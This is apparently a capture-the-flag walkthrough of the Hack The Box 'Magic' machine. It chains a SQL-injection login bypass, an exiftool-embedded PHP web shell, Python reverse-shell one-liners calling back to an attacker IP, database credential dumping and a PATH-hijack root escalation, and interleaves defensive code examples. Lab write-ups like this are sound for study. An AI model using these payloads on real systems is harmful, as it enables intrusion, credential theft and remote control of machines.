 2020-04-28   2.8k

HTB::Magic Walkthrough

0x01 Info Card

0x02 Tools and Tips

  • nmap
  • exiftool
  • LinEnum.sh
  • SQL Injection
  • mysqldump
  • sysinfo
  • PATH variable

0x03 Pentesting

Initial Enumeration

Port scan:

$ nmap -A -Pn -T4 -p- 10.10.10.185
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-23 10:22 EDT
Stats: 0:10:27 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 22.07% done; ETC: 11:10 (0:36:54 remaining)
Warning: 10.10.10.185 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.10.185
Host is up (0.34s latency).
Not shown: 65455 closed ports, 78 filtered ports

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
| 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_ 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)

80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6500.05 seconds

Port 80 is the usual web port. The site has a login page; a few quick tries show it is the usual SQL injection. Modify the request in Burp with the classic bypass payload admin' or 1=1--+ and you are logged in.
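The bypass above works because the submitted username is concatenated into the query text. As an added illustration (not code from the original post or the site), here is a minimal vulnerable login next to its parameterised fix, run against an in-memory SQLite stand-in for the site's user table; the table name, columns and sample row are assumptions.

```python
import sqlite3

# The bypass string from the walkthrough. "admin'" closes the string literal,
# "or 1=1" makes the WHERE clause true and "--" comments out the rest.
PAYLOAD = "admin' or 1=1--+"


def make_db():
    """In-memory stand-in for the site's user table (constructed sample data)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE login (username TEXT, password TEXT)")
    con.execute("INSERT INTO login VALUES ('admin', 'sample-password')")
    return con


def login_vulnerable(con, username, password):
    """String concatenation: user input becomes part of the SQL grammar."""
    sql = ("SELECT username FROM login WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return con.execute(sql).fetchone()


def login_safe(con, username, password):
    """Bound parameters: the same input is compared as a plain string value."""
    sql = "SELECT username FROM login WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchone()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "wrong"))  # ('admin',)
    print("safe:      ", login_safe(db, PAYLOAD, "wrong"))        # None
```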

After logging in there is an image upload feature. Some testing shows that only files with a fixed set of image extensions are accepted, but the image content itself does not appear to be checked. Take any normal image and write the payload into it with exiftool:

exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' normal.jpg

Rename the extension:

mv normal.jpg normal.php.jpg

After uploading, view the source of the home page: the uploaded image's relative path is images/uploads/normal.php.jpg. Visiting that path shows the PHP output is rendered as expected.
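The upload got through because the check looked only at the file extension. As an added example (not code from the original site), here are the server-side checks that would have rejected normal.php.jpg: exactly one extension, magic bytes that match it, and no PHP open tag anywhere in the bytes, including the EXIF/COM segment where exiftool -Comment puts its text. The function name and the allow-list are assumptions.

```python
import re

# Magic bytes for the image types we are willing to store (assumed allow-list).
ALLOWED_TYPES = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
}
# "<?php" and the short echo tag "<?=" anywhere in the file, metadata included.
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def upload_problems(filename: str, data: bytes) -> list:
    """Return the reasons to reject this upload; an empty list means accept."""
    problems = []
    parts = filename.lower().split(".")
    # "normal.php.jpg" carries two extensions; accept only name.ext.
    if len(parts) != 2 or not parts[0]:
        problems.append("filename must be name.ext with exactly one extension")
    ext = parts[-1] if len(parts) > 1 else ""
    magic = ALLOWED_TYPES.get(ext)
    if magic is None:
        problems.append("extension %r is not an allowed image type" % ext)
    elif not data.startswith(magic):
        # Extension says image, bytes say otherwise.
        problems.append("file content does not match the claimed image type")
    if PHP_OPEN_TAG.search(data):
        # Defence in depth: uploads must never reach the PHP interpreter anyway.
        problems.append("PHP open tag found inside image data")
    return problems


if __name__ == "__main__":
    sample = b"\xff\xd8\xff\xfe\x00\x14<?php phpinfo(); ?>"  # constructed JPEG-like bytes
    print(upload_problems("normal.php.jpg", sample))
```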

Then append the following as the cmd parameter in the URL to launch a reverse shell, with a listener waiting on the matching port on the attacking machine:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Note: this box only has a Python 3 environment.

We get a shell as www-data:

$ nc -lvp 4444
listening on [any] 4444 ...
10.10.10.185: inverse host lookup failed: Unknown host
connect to [10.10.14.16] from (UNKNOWN) [10.10.10.185] 58816
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@ubuntu:/var/www/Magic/images/uploads$

Getting User Access

Looking for sensitive files:

www-data@ubuntu:/var/www/Magic/images/uploads$ cd ../../
cd ../../
www-data@ubuntu:/var/www/Magic$ ls
ls
assets db.php5 images index.php login.php logout.php
www-data@ubuntu:/var/www/Magic$ cat db.php5
cat db.php5
<?php
class Database
{
private static $dbName = 'Magic' ;
private static $dbHost = 'localhost' ;
private static $dbUsername = 'theseus';
private static $dbUserPassword = 'iamkingtheseus';

private static $cont = null;

public function __construct() {
die('Init function is not allowed');
}

public static function connect()
{
// One connection through whole application
if ( null == self::$cont )
{
try
{
self::$cont = new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
}
catch(PDOException $e)
{
die($e->getMessage());
}
}
return self::$cont;
}

public static function disconnect()
{
self::$cont = null;
}
}

This config file holds the username theseus and the password iamkingtheseus. Try switching user with that password:

www-data@ubuntu:/var/www/Magic$ su theseus
su theseus
Password: iamkingtheseus

su: Authentication failure

Wrong password, so this is presumably the MySQL login password. But when I tried the mysql client, the box told me to apt-get install it, even though a MySQL service is clearly running:

www-data@ubuntu:/var/www/Magic$ ls -la /usr/bin/ | grep mysql
ls -la /usr/bin/ | grep mysql
-rwxr-xr-x 1 root root 3627200 Jan 21 06:10 mysql_config_editor
-rwxr-xr-x 1 root root 22558552 Jan 21 06:10 mysql_embedded
-rwxr-xr-x 1 root root 5179616 Jan 21 06:10 mysql_install_db
-rwxr-xr-x 1 root root 3616952 Jan 21 06:10 mysql_plugin
-rwxr-xr-x 1 root root 3784424 Jan 21 06:10 mysql_secure_installation
-rwxr-xr-x 1 root root 3653288 Jan 21 06:10 mysql_ssl_rsa_setup
-rwxr-xr-x 1 root root 3569976 Jan 21 06:10 mysql_tzinfo_to_sql
-rwxr-xr-x 1 root root 4442320 Jan 21 06:10 mysql_upgrade
-rwxr-xr-x 1 root root 3799752 Jan 21 06:10 mysqladmin
lrwxrwxrwx 1 root root 10 Jan 21 06:10 mysqlanalyze -> mysqlcheck
-rwxr-xr-x 1 root root 4068280 Jan 21 06:10 mysqlbinlog
-rwxr-xr-x 1 root root 3825320 Jan 21 06:10 mysqlcheck
-rwxr-xr-x 1 root root 26952 Jan 21 06:10 mysqld_multi
-rwxr-xr-x 1 root root 28448 Jan 21 06:10 mysqld_safe
-rwxr-xr-x 1 root root 3875176 Jan 21 06:10 mysqldump
-rwxr-xr-x 1 root root 7865 Jan 21 06:10 mysqldumpslow
-rwxr-xr-x 1 root root 3791912 Jan 21 06:10 mysqlimport
lrwxrwxrwx 1 root root 10 Jan 21 06:10 mysqloptimize -> mysqlcheck
-rwxr-xr-x 1 root root 4286120 Jan 21 06:10 mysqlpump
lrwxrwxrwx 1 root root 10 Jan 21 06:10 mysqlrepair -> mysqlcheck
-rwxr-xr-x 1 root root 39016 Jan 12 2018 mysqlreport
-rwxr-xr-x 1 root root 3790504 Jan 21 06:10 mysqlshow
-rwxr-xr-x 1 root root 3809512 Jan 21 06:10 mysqlslap

Found mysqldump, so dump the MySQL database:

mysqldump --databases Magic -utheseus -piamkingtheseus

The dump yields the site username and password admin:Th3s3usW4sK1ng.

Then add the local SSH public key to /home/theseus/.ssh/authorized_keys on the target and log in directly over SSH:

$ ssh theseus@10.10.10.185
The authenticity of host '10.10.10.185 (10.10.10.185)' can't be established.
ECDSA key fingerprint is SHA256:yx0Y6af8RGpG0bHr1AQtS+06uDomn1MMZVzpNaHEv0A.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.185' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-42-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

29 packages can be updated.
0 updates are security updates.

Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Sat Apr 25 22:27:50 2020 from 10.10.14.44
theseus@ubuntu:~$ id
uid=1000(theseus) gid=1000(theseus) groups=1000(theseus),100(users)

Getting Root Access

Searching for SUID files:

theseus@ubuntu:~/.ssh$ find / -perm -u=s -type f 2>/dev/null
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/arping
/usr/bin/vmware-user-suid-wrapper
/usr/lib/openssh/ssh-keysign
...
/bin/umount
/bin/fusermount
/bin/sysinfo
/bin/mount
/bin/su
/bin/ping

One SUID binary is out of the ordinary: sysinfo

theseus@ubuntu:~$ file /bin/sysinfo
file /bin/sysinfo
/bin/sysinfo: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=9e9d26d004da0634c0747d16d377cd2a934e565a, not stripped

Run it:

theseus@ubuntu:~$ sysinfo
sysinfo
====================Hardware Info====================
H/W path Device Class Description
=====================================================
system VMware Virtual Platform
/0 bus 440BX Desktop Reference Platform
/0/0 memory 86KiB BIOS
/0/1 processor AMD EPYC 7401P 24-Core Processor
/0/1/0 memory 16KiB L1 cache
/0/1/1 memory 16KiB L1 cache
/0/100/17.5 bridge PCI Express Root Port
/0/100/17.6 bridge PCI Express Root Port
/0/100/17.7 bridge PCI Express Root Port
/0/100/18 bridge PCI Express Root Port
/0/100/18.1 bridge PCI Express Root Port
/0/100/18.2 bridge PCI Express Root Port
/0/100/18.3 bridge PCI Express Root Port
/0/100/18.4 bridge PCI Express Root Port
/0/100/18.5 bridge PCI Express Root Port
/0/100/18.6 bridge PCI Express Root Port
/0/100/18.7 bridge PCI Express Root Port
/0/46 scsi0 storage
/0/46/0.0.0 /dev/cdrom disk VMware IDE CDR00
/1 system

====================Disk Info====================
Disk /dev/loop0: 3.7 MiB, 3825664 bytes, 7472 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop1: 54.5 MiB, 57151488 bytes, 111624 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop11: 3.7 MiB, 3862528 bytes, 7544 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

====================CPU Info====================
processor : 0
vendor_id : AuthenticAMD
cpu family : 23
model : 1
model name : AMD EPYC 7401P 24-Core Processor
stepping : 2
microcode : 0x8001230
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl tsc_reliable nonstop_tsc cpuid extd_apicid pni pclmulqdq ssse3 fma cx16 sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ssbd ibpb vmmcall fsgsbase bmi1 avx2 smep bmi2 rdseed adx smap clflushopt sha_ni xsaveopt xsavec xsaves clzero arat overflow_recov succor
bugs : fxsave_leak sysret_ss_attrs null_seg spectre_v1 spectre_v2 spec_store_bypass
bogomips : 4000.00
TLB size : 2560 4K pages
clflush size : 64
cache_alignment : 64
address sizes : 43 bits physical, 48 bits virtual
power management:


====================MEM Usage=====================
total used free shared buff/cache available
Mem: 3.8G 566M 2.4G 4.0M 929M 3.1G
Swap: 947M 0B 947M

The sysinfo output has four main sections:

  • Hardware Info
  • Disk Info
  • CPU Info
  • Mem Usage

Looking at the hints left by earlier players on the forum, sysinfo is a wrapper that calls four Linux commands in sequence:

  • Hardware Info = lshw -short
  • Disk Info = fdisk -l
  • CPU Info = cat /proc/cpuinfo
  • Mem Usage = free -h

Since sysinfo invokes these native Linux commands by name, we can change the PATH variable and create our own "binary" whose content we control and whose file name is any of the four commands above. Concretely:

Create a file named fdisk in /tmp/magic and write a reverse shell into it:

theseus@ubuntu:/tmp/magic$ touch fdisk
touch fdisk
theseus@ubuntu:/tmp/magic$ echo python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > fdisk

Set its permissions to 755:

theseus@ubuntu:/tmp/magic$ chmod 755 fdisk

Then prepend /tmp/magic to the PATH environment variable:

theseus@ubuntu:/tmp/magic$ export PATH=/tmp/magic:$PATH
export PATH=/tmp/magic:$PATH

A more detailed explanation is in this article: https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/

That achieves the goal: sysinfo will now execute the fdisk in /tmp/magic instead of the real one.

Listen on port 1234 locally and run the sysinfo command on the target:

Ncat: Connection from 10.10.10.185:45410.
python3 -c 'import pty; pty.spawn("/bin/bash")'
root@ubuntu:/tmp# whoami
whoami
root
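From the defender's side, the weakness is a setuid program that runs its helpers by bare name and trusts the caller's PATH. An added example (not from the box or the original post) that audits a binary the way a reviewer would: extract its printable strings, as strings(1) does, and flag embedded command lines whose first word is an unqualified helper name. The helper list comes from the forum hints above; the sample bytes are constructed.

```python
import re

# Helpers the walkthrough says sysinfo runs. A setuid wrapper should call
# these by absolute path (or reset PATH itself) so a user-controlled PATH
# cannot redirect them to a file such as /tmp/magic/fdisk.
WATCHED_COMMANDS = {"lshw", "fdisk", "cat", "free"}
STRING_RUN = re.compile(rb"[\x20-\x7e]{4,}")  # printable ASCII runs, like strings(1)


def printable_strings(data: bytes):
    """Yield printable ASCII runs of four or more characters from a binary."""
    for match in STRING_RUN.finditer(data):
        yield match.group().decode("ascii")


def relative_command_invocations(data: bytes) -> list:
    """Return embedded command lines that name a watched helper without a
    leading path, i.e. lines that the shell would resolve through $PATH."""
    hits = []
    for line in printable_strings(data):
        line = line.strip()
        first_word = line.split(" ", 1)[0]
        if first_word in WATCHED_COMMANDS:   # "/usr/bin/free -h" never matches here
            hits.append(line)
    return hits


def audit_file(path: str) -> list:
    """Run the check on a file on disk, e.g. each setuid binary found with find."""
    with open(path, "rb") as f:
        return relative_command_invocations(f.read())


# Constructed stand-in for a compiled wrapper: two bare helpers, one qualified.
SAMPLE_BINARY = (b"\x7fELF\x02\x01\x01" + b"\x00" * 9
                 + b"lshw -short\x00fdisk -l\x00/usr/bin/free -h\x00")

if __name__ == "__main__":
    for hit in relative_command_invocations(SAMPLE_BINARY):
        print("PATH-dependent helper call:", hit)
```

On a real system the same check is run as audit_file("/bin/sysinfo") from the account that found the SUID binary.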

0x04 Summary

  • Log in to the image upload page via SQL injection
  • Use exiftool to add a web shell to a normal image
  • Upload the image to obtain a reverse shell as www-data
  • Read the MySQL username and password from db.php5
  • Back up the database with mysqldump to obtain the site's admin password, which is also user theseus's su password
  • Analyse the output of sysinfo
  • Escalate privileges via the PATH variable

Copyright © ca01h 2019-2020